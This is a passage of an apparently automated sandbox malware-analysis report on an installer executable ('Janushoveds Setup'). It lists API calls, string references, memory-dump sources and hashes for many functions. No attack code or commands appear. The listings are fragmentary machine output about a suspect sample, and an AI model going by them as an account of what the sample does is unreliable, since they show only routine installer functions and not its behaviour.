                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$ButtonCheckColorItemlstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1008850623-0
                                                                                                                                                              • Opcode ID: 5233311059dd207dde4360c340b317ac74a5a43ec41aa9b35b2e8dcb63a3240b
                                                                                                                                                              • Instruction ID: cdae61568e6ea9b8d5b13b82b4945475f556892225fa3a195f49dd648399fb8e
                                                                                                                                                              • Opcode Fuzzy Hash: 5233311059dd207dde4360c340b317ac74a5a43ec41aa9b35b2e8dcb63a3240b
                                                                                                                                                              • Instruction Fuzzy Hash: 6D3181B1A00108BFDB019F64DD85EAD3BB8FB85744F00407AFA05BB1A0D7799E51DBA4
                                                                                                                                                              APIs
                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                                                                                              • CharNextW.USER32(?,00000000,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                                                                                              • CharPrevW.USER32(?,?,774D3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Kb94RzMYNf.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                                                                                              Strings
                                                                                                                                                              • *?|<>/":, xrefs: 00406336
                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
                                                                                                                                                              • "C:\Users\user\Desktop\Kb94RzMYNf.exe", xrefs: 004062E4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                              • API String ID: 589700163-705300654
                                                                                                                                                              • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                                                                                              • Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
                                                                                                                                                              • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                                                                                              • Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD
                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404198
                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 004041B4
                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004041C0
                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 004041CC
                                                                                                                                                              • GetSysColor.USER32(?), ref: 004041DF
                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 004041EF
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404209
                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404213
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                              • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                              • Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
                                                                                                                                                              • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                              • Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64
                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                                                • Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D1C
                                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                              • String ID: 9
                                                                                                                                                              • API String ID: 163830602-2366072709
                                                                                                                                                              • Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                                                                                              • Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
                                                                                                                                                              • Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                                                                                              • Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
                                                                                                                                                              • GetMessagePos.USER32 ref: 00404A9C
                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404AB6
                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                              • String ID: f
                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                              • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                                              • Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
                                                                                                                                                              • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                                              • Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4
                                                                                                                                                              APIs
                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                                                              • MulDiv.KERNEL32(000BF3F6,00000064,000BF3FA), ref: 00402D4D
                                                                                                                                                              • wsprintfW.USER32 ref: 00402D5D
                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                                                              Strings
                                                                                                                                                              • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                              • Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                                                                                              • Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
                                                                                                                                                              • Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
                                                                                                                                                              • Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                              • Opcode ID: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                                                                                              • Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
                                                                                                                                                              • Opcode Fuzzy Hash: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                                                                                              • Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28
                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(?), ref: 00401D59
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                                              • Opcode ID: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                                                                                                                              • Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
                                                                                                                                                              • Opcode Fuzzy Hash: bb59d375fd00ea9bf7a16e1c15933f8724b19bfa5ac8ca4f719c71241bcbf4da
                                                                                                                                                              • Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                                                                                              • wsprintfW.USER32 ref: 00404A15
                                                                                                                                                              • SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                              • Opcode ID: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                                                                                                                              • Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
                                                                                                                                                              • Opcode Fuzzy Hash: 224b46551f0518a21af59e08ab662a7d6db9c20c9ea580731f6276641f89a3f9
                                                                                                                                                              • Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9
                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowTextW.USER32(00000000,Janushoveds Setup), ref: 00403C07
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Kb94RzMYNf.exe"$1033$Janushoveds Setup
                                                                                                                                                              • API String ID: 530164218-4240642014
                                                                                                                                                              • Opcode ID: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                                                                                                                              • Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
                                                                                                                                                              • Opcode Fuzzy Hash: 59ce6dc07d6ca67894d75a769e307db226b6569afcabdc78d824c7418b618399
                                                                                                                                                              • Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98
                                                                                                                                                              APIs
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll,?,?,0040B5D0,000000FF,C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1359567053.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1359529656.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359593459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359623133.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1359895311.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Kb94RzMYNf.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll
                                                                                                                                                              • API String ID: 3109718747-3313819243
                                                                                                                                                              • Opcode ID: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
